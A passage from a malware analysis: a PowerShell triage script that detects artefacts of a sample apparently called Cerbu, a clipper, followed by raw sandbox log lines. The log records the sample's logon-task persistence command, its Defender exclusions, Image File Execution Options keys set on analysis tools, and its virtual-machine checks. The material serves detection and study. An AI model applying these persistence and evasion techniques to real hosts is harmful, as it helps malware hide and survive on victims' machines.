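    $mp = Get-MpPreference -ErrorAction Stop
    $droppedDirs = @($env:ProgramData, 'C:\Users\Public')
    foreach ($p in @($mp.ExclusionPath)) {
        if ($droppedDirs -contains $p) { $findings.Add("Defender path exclusion present: $p") }
    }
    $exts = @($mp.ExclusionExtension) | ForEach-Object { $_.TrimStart('.') }
    if ($exts -contains 'exe') { $findings.Add('Defender extension exclusion present: .exe (no executable is scanned)') }

    # 2. Defender's own configuration-change trail. Assumption (not from the report):
    #    event 5007 in the Defender Operational log names the changed registry value.
    $log = 'Microsoft-Windows-Windows Defender/Operational'
    Get-WinEvent -FilterHashtable @{ LogName = $log; Id = 5007 } -ErrorAction SilentlyContinue |
        Where-Object { $_.Message -match 'Exclusions\\(Paths|Extensions)' } |
        ForEach-Object { $findings.Add("Defender event 5007 at $($_.TimeCreated): exclusion change recorded") }

    # 3. MSRT tampering: policy value added with reg.exe, MRT.exe deleted from System32.
    #    MRT.exe only exists on hosts where the tool has run before, so its absence
    #    is a lead, not proof.
    $mrt = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\MRT' -Name 'DontOfferThroughWUAU' -ErrorAction SilentlyContinue
    if ($mrt -and $mrt.DontOfferThroughWUAU -eq 1) {
        $findings.Add('HKLM\SOFTWARE\Policies\Microsoft\MRT\DontOfferThroughWUAU = 1 (MSRT no longer offered through Windows Update)')
    }
    if (-not (Test-Path -LiteralPath "$env:SystemRoot\System32\MRT.exe")) { $findings.Add('MRT.exe absent from System32') }

    # 4. Logon persistence: schtasks /Create /TR ...\SgrmBroker.exe /SC ONLOGON /TN TMPSYSUPD /RL highest
    $task = Get-ScheduledTask -TaskName 'TMPSYSUPD' -ErrorAction SilentlyContinue
    if ($task) {
        $exe = ($task.Actions | ForEach-Object { $_.Execute }) -join ';'
        $findings.Add("Scheduled task TMPSYSUPD present: RunLevel=$($task.Principal.RunLevel) Execute=$exe")
    }

    # 5. Dropped binaries named after Windows components. The genuine SgrmBroker.exe
    #    lives in System32; a copy under ProgramData\Fonts_Backup is the implant.
    $dropped = @(
        'C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe',
        'C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exe'
    )
    foreach ($f in $dropped) {
        if (Test-Path -LiteralPath $f) {
            $hash = (Get-FileHash -LiteralPath $f -Algorithm SHA256).Hash
            $size = (Get-Item -LiteralPath $f).Length
            $sig  = (Get-AuthenticodeSignature -LiteralPath $f).Status
            $findings.Add("Dropped file present: $f sha256=$hash size=$size signature=$sig")
        }
    }
    Get-Process -Name 'SgrmBroker', 'SppExtComObj' -ErrorAction SilentlyContinue |
        Where-Object { $_.Path -and $_.Path -notlike "$env:SystemRoot\System32\*" } |
        ForEach-Object { $findings.Add("Running from a user-writable path: PID $($_.Id) $($_.Path)") }

    # 6. The implant's mutex (session-local in the report, so no Global\ prefix).
    try {
        $m = [System.Threading.Mutex]::OpenExisting('HgSyVtdfIS')
        $m.Dispose()
        $findings.Add('Mutex HgSyVtdfIS is open in this session: the dropped SgrmBroker.exe is running')
    } catch [System.Threading.WaitHandleCannotBeOpenedException] {
        # not present: nothing to report
    } catch {
        # exists but cannot be opened (e.g. access denied): still evidence it is there
        $findings.Add("Mutex HgSyVtdfIS exists but could not be opened: $($_.Exception.GetType().Name)")
    }

    if ($findings.Count -eq 0) { 'No artefacts from this sample found.' } else { $findings }
}

Invoke-CerbuSampleTriage
```

Removing the exclusions (Remove-MpPreference with the same arguments), unregistering the task and deleting the dropped files undo the visible changes, but the exclusion window means anything else written to those two directories while the exclusion was active was never scanned, so re-scan them after the exclusion is gone.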
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe | Sections loaded: apphelp.dll, powrprof.dll, pdh.dll, propsys.dll, cryptbase.dll, umpdc.dll, edgegdi.dll, kernel.appcore.dll, perfos.dll, wbemcomn.dll, amsi.dll, userenv.dll, profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Sections loaded: atl.dll, mscoree.dll, edgegdi.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, amsi.dll, msasn1.dll, userenv.dll, profapi.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, urlmon.dll, xmllite.dll, iertutil.dll, srvcli.dll, netutils.dll, secur32.dll, sspicli.dll, uxtheme.dll, propsys.dll, wininet.dll, microsoft.management.infrastructure.native.unmanaged.dll, mi.dll, miutils.dll, wmidcom.dll, dpapi.dll, wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Sections loaded: fastprox.dll, ncobjapi.dll, wbemcomn.dll, edgegdi.dll, kernel.appcore.dll, mpclient.dll, userenv.dll, version.dll, msasn1.dll, wmitomi.dll, mi.dll, miutils.dll, gpapi.dll
Source: C:\Windows\System32\wusa.exe | Sections loaded: dpx.dll, wtsapi32.dll, cryptsp.dll, edgegdi.dll, kernel.appcore.dll, uxtheme.dll
Source: C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exe | Sections loaded: apphelp.dll, powrprof.dll, iphlpapi.dll, secur32.dll, netapi32.dll, pdh.dll, propsys.dll, cryptbase.dll, sspicli.dll, netutils.dll, samcli.dll, umpdc.dll, edgegdi.dll
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe | Sections loaded: apphelp.dll, powrprof.dll, pdh.dll, propsys.dll, edgegdi.dll, umpdc.dll, kernel.appcore.dll, wbemcomn.dll, amsi.dll, userenv.dll, profapi.dll, perfos.dll
Source: C:\Windows\System32\schtasks.exe | Sections loaded: kernel.appcore.dll, taskschd.dll, sspicli.dll, xmllite.dll
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeStatic file information: File size 30441984 > 1048576
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x1cad000
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: sunshine_clipper.pdb source: SgrmBroker.exe, 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmp, SgrmBroker.exe, 00000018.00000000.2352610812.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: gametoolset.pdb source: SppExtComObj.exe, 00000017.00000000.2292286211.00007FF68609E000.00000002.00000001.01000000.00000008.sdmp, SppExtComObj.exe, 00000017.00000002.2572042733.00007FF68609E000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: sunshine_clipper.pdbHG source: SgrmBroker.exe, 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmp, SgrmBroker.exe, 00000018.00000000.2352610812.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmp
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Static PE information: section name: .voltbl
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Static PE information: section name: _RDATA
Source: SppExtComObj.exe.5.dr Static PE information: section name: .voltbl
Source: SppExtComObj.exe.5.dr Static PE information: section name: _RDATA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_00007FF848E7D2A5 pushad ; iretd 12_2_00007FF848E7D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_00007FF848F9380D pushad ; iretd 12_2_00007FF848F93811
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_00007FF848F9846B push ebx; ret 12_2_00007FF848F9856A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_00007FF848F9248D push E95B6C93h; ret 12_2_00007FF848F92539
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_00007FF848F900BD pushad ; iretd 12_2_00007FF848F900C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_00007FF848F924ED push E95B6C93h; ret 12_2_00007FF848F92539
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe File created: C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exe

Boot Survival

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tcpview.exe MinimumStackCommitInBytes
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tcpview64.exe MinimumStackCommitInBytes
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\autorunsc.exe MinimumStackCommitInBytes
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MediaCreationTool22H2.exe MinimumStackCommitInBytes
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vssadmin.exe MinimumStackCommitInBytes
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dism.exe MinimumStackCommitInBytes
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mstsc.exe MinimumStackCommitInBytes
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GlassWire.exe MinimumStackCommitInBytes
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /Create /TR C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe /SC ONLOGON /TN TMPSYSUPD /F /RL highest

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PortConnector
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_PhysicalConnector
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_Slot
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PortConnector
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_PhysicalConnector
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_Slot
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9901
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Check user administrative privileges: GetTokenInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5272 Thread sleep count: 9901 > 30
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B124A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: THyper-V Hypervisor Root Virtual Processor0&
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B11CC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B124A000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000002.2573746775.00000236ACA50000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Dynamic Memory Integration Service
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B124A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Virtual Machine Bus PipesL
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B124A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Virtual Machine BusA
Source: SgrmBroker.exe, 00000018.00000002.2572548806.00000236AAFA7000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2444417839.00000236AD049000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2424523609.00000236AD048000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V HypervisorD0nf
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B11CC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V VM Vid Partitionr
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B124A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: DHyper-V Virtual Machine Bus Pipes
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B124A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: &Hyper-V Hypervisorn
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B11C1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: &Hyper-V HypervisorrD
Source: SgrmBroker.exe, 00000018.00000002.2573746775.00000236ACA50000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Hypervisor Root Partitionl5
Source: SgrmBroker.exe, 00000018.00000002.2573746775.00000236ACA50000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000002.2572548806.00000236AAFA7000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2424523609.00000236AD00E000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2445898978.00000236AD001000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V VM Vid Partition
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B11CC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B124A000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2445898978.00000236AD038000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000002.2572548806.00000236AAFA7000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2424523609.00000236AD039000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Hypervisor Root Partition
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B124A000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000002.2573746775.00000236ACA50000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VHyper-V Dynamic Memory Integration Service
Source: SgrmBroker.exe, 00000018.00000003.2445898978.00000236AD038000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000002.2572548806.00000236AAFA7000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2424523609.00000236AD039000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Hypervisor0Y9
Source: SgrmBroker.exe, 00000018.00000002.2572548806.00000236AAFA7000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2444417839.00000236AD049000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2424523609.00000236AD048000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 2Hyper-V VM Vid Partitionem)
Source: SgrmBroker.exe, 00000018.00000002.2573746775.00000236ACA50000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000002.2572548806.00000236AAFA7000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2444417839.00000236AD049000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2424523609.00000236AD048000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Virtual Machine Bus Pipes
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B124A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Virtual Machine Bus Pipes_@z
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B124A000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000002.2573746775.00000236ACA50000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: JHyper-V Hypervisor Logical Processor
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B124A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Hypervisor Logical ProcessorllKAw
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B124A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 2Hyper-V VM Vid PartitionY
Source: SgrmBroker.exe, 00000018.00000002.2573746775.00000236ACA50000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: THyper-V Hypervisor Root Virtual Processorexe
Source: SgrmBroker.exe, 00000018.00000002.2573746775.00000236ACA50000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Hypervisor Logical Processor.syse
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B11CC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V VM Vid Partitionll
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B11CC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B124A000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2445898978.00000236AD038000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000002.2573746775.00000236ACA50000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000002.2572548806.00000236AAFA7000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2424523609.00000236AD039000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Hypervisor Root Virtual Processor
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B124A000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000002.2573746775.00000236ACA50000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: X2Hyper-V VM Vid Partition
Source: SgrmBroker.exe, 00000018.00000002.2573746775.00000236ACA50000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: THyper-V Hypervisor Root Virtual Processor
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B11CC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Hypervisor Logical Processorc.sysO
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B124A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: THyper-V Hypervisor Root Virtual Processor.
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B124A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: JHyper-V Hypervisor Logical Processor
Source: SgrmBroker.exe, 00000018.00000002.2573746775.00000236ACA50000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AlDHyper-V Virtual Machine Bus Pipes8
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B124A000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000002.2573746775.00000236ACA50000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: sWDHyper-V Hypervisor Root Partition
Source: SgrmBroker.exe, 00000018.00000002.2572548806.00000236AAFA7000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2444417839.00000236AD049000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2424523609.00000236AD048000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: &Hyper-V Hypervisors(x'bs
Source: SgrmBroker.exe, 00000018.00000002.2573746775.00000236ACA50000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: &Hyper-V Hypervisor
Source: SgrmBroker.exe, 00000018.00000002.2572548806.00000236AAFA7000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2444417839.00000236AD049000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2424523609.00000236AD048000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Dynamic Memory Integration ServicefwP
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B124A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: DHyper-V Hypervisor Root Partition1
Source: SgrmBroker.exe, 00000018.00000002.2572548806.00000236AAFA7000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2424523609.00000236AD00E000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2445898978.00000236AD001000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: DHyper-V Hypervisor Root Partition3
Source: SgrmBroker.exe, 00000018.00000002.2572548806.00000236AAFA7000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2424523609.00000236AD00E000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2445898978.00000236AD001000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: DHyper-V Virtual Machine Bus PipesYE4
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B11CC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V Virtual Machine Bus Pipesl
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B124A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: AlDHyper-V Virtual Machine Bus Pipes
Source: SgrmBroker.exe, 00000018.00000002.2572548806.00000236AAFA7000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2444417839.00000236AD049000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2424523609.00000236AD048000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V Virtual Machine BusLwQ
Source: SgrmBroker.exe, 00000018.00000003.2445898978.00000236AD038000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000002.2572548806.00000236AAFA7000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2424523609.00000236AD039000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V Hypervisor Logical Processormui7\O
Source: SgrmBroker.exe, 00000018.00000002.2572548806.00000236AAFA7000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2424523609.00000236AD00E000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2445898978.00000236AD001000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: JHyper-V Hypervisor Logical ProcessorGE"
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1656543805.00000245B0E4F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1653171137.00000245B0E5D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1655673640.00000245B0E5D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1651694113.00000245B0E4F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle 
Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Re
